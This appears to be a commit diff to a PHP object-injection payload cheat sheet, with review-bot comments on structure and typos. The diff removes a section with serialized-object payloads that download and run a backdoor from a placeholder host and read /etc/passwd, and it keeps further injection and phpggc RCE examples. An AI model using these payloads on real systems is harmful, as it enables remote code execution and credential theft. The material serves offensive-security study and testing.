PHP POP Chain

Swissky 2020-09-10 15:15:53 +02:00
parent ddabfd7531
commit 543f63d7de


@ -10,7 +10,16 @@ The following magic methods will help you for a PHP Object injection
Also you should check the `Wrapper Phar://` in [File Inclusion](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/File%20Inclusion#wrapper-phar) which use a PHP object injection. Also you should check the `Wrapper Phar://` in [File Inclusion](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/File%20Inclusion#wrapper-phar) which use a PHP object injection.
## __wakeup in the unserialize function ## Summary
* [General concept](#general-concept)
* [Authentication bypass](#authentication-bypass)
* [Finding and using gadgets](#finding-and-using-gadgets)
* [Real world examples](#real-world-examples)
* [References](#references)
## General concept
Vulnerable code: Vulnerable code:
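Review bot: the new Summary links to `#authentication-bypass`, but no `## Authentication bypass` heading appears anywhere in this diff, while the old `## __wakeup in the unserialize function` heading is dropped; please confirm that heading exists further down (or add it) so the table of contents has no dead anchor. While touching this block, the context sentence "in File Inclusion which use a PHP object injection" should read "which uses".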
@ -38,7 +47,7 @@ Vulnerable code:
?> ?>
``` ```
Payload: Craft a payload using existing code inside the application.
```php ```php
# Basic serialized data # Basic serialized data
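Review bot: the replacement lead-in "Craft a payload using existing code inside the application." states what to do but not why, and this is the key concept of the section; suggest one more clause, e.g. "Craft a payload using classes that already exist in the application, since `unserialize()` can only instantiate classes that are declared or autoloaded at the time of the call." That ties the `# Basic serialized data` example that follows to the vulnerable code above it.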
@ -102,36 +111,10 @@ Payload:
O:6:"Object":2:{s:10:"secretCode";N;s:4:"guess";R:2;} O:6:"Object":2:{s:10:"secretCode";N;s:4:"guess";R:2;}
``` ```
## Others exploits
Reverse Shell
```php
class PHPObjectInjection
{
// CHANGE URL/FILENAME TO MATCH YOUR SETUP
public $inject = "system('wget http://URL/backdoor.txt -O phpobjbackdoor.php && php phpobjbackdoor.php');";
}
echo urlencode(serialize(new PHPObjectInjection));
```
Basic detection
```php
class PHPObjectInjection
{
// CHANGE URL/FILENAME TO MATCH YOUR SETUP
public $inject = "system('cat /etc/passwd');";
}
echo urlencode(serialize(new PHPObjectInjection));
//O%3A18%3A%22PHPObjectInjection%22%3A1%3A%7Bs%3A6%3A%22inject%22%3Bs%3A26%3A%22system%28%27cat+%2Fetc%2Fpasswd%27%29%3B%22%3B%7D
//'O:18:"PHPObjectInjection":1:{s:6:"inject";s:26:"system(\'cat+/etc/passwd\');";}'
```
## Finding and using gadgets ## Finding and using gadgets
Also called "PHP POP Chains", they can be used to gain RCE on the system.
[PHPGGC](https://github.com/ambionics/phpggc) is a tool built to generate the payload based on several frameworks: [PHPGGC](https://github.com/ambionics/phpggc) is a tool built to generate the payload based on several frameworks:
- Laravel - Laravel
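Review bot: in the added sentence "Also called "PHP POP Chains", they can be used to gain RCE on the system." the pronoun "they" has no antecedent (the heading says "gadgets", but it is the chain of gadgets that is called a POP chain); suggest "Gadget chains, also called PHP POP chains, can be used to gain RCE on the system." Separately, removing the whole `## Others exploits` section also deletes the "Basic detection" snippet, which was the only place in this file showing a serialized object next to its URL-encoded form; if that content now lives elsewhere, a short pointer to it would help, otherwise consider keeping the detection example under the new structure.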
@ -165,3 +148,4 @@ phpggc monolog/rce1 'phpinfo();' -s
* [CTF writeup: PHP object injection in kaspersky CTF](https://medium.com/@jaimin_gohel/ctf-writeup-php-object-injection-in-kaspersky-ctf-28a68805610d) * [CTF writeup: PHP object injection in kaspersky CTF](https://medium.com/@jaimin_gohel/ctf-writeup-php-object-injection-in-kaspersky-ctf-28a68805610d)
* [Jack The Ripper Web challeneg Write-up from ECSC 2019 Quals Team France by Rawsec](https://rawsec.ml/en/ecsc-2019-quals-write-ups/#164-Jack-The-Ripper-Web) * [Jack The Ripper Web challeneg Write-up from ECSC 2019 Quals Team France by Rawsec](https://rawsec.ml/en/ecsc-2019-quals-write-ups/#164-Jack-The-Ripper-Web)
* [Rusty Joomla RCE Unserialize overflow](https://blog.hacktivesecurity.com/index.php?controller=post&action=view&id_post=41) * [Rusty Joomla RCE Unserialize overflow](https://blog.hacktivesecurity.com/index.php?controller=post&action=view&id_post=41)
* [PHP Pop Chains - Achieving RCE with POP chain exploits. - Vickie Li - September 3, 2020](https://vkili.github.io/blog/insecure%20deserialization/pop-chains/)
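Review bot: the context line just above the new reference still carries the typo "Jack The Ripper Web challeneg Write-up" ("challenge"); since this hunk already edits the list, fix it here. The added entry "PHP Pop Chains - Achieving RCE with POP chain exploits. - Vickie Li - September 3, 2020" has a stray period before the author separator that the other entries do not use.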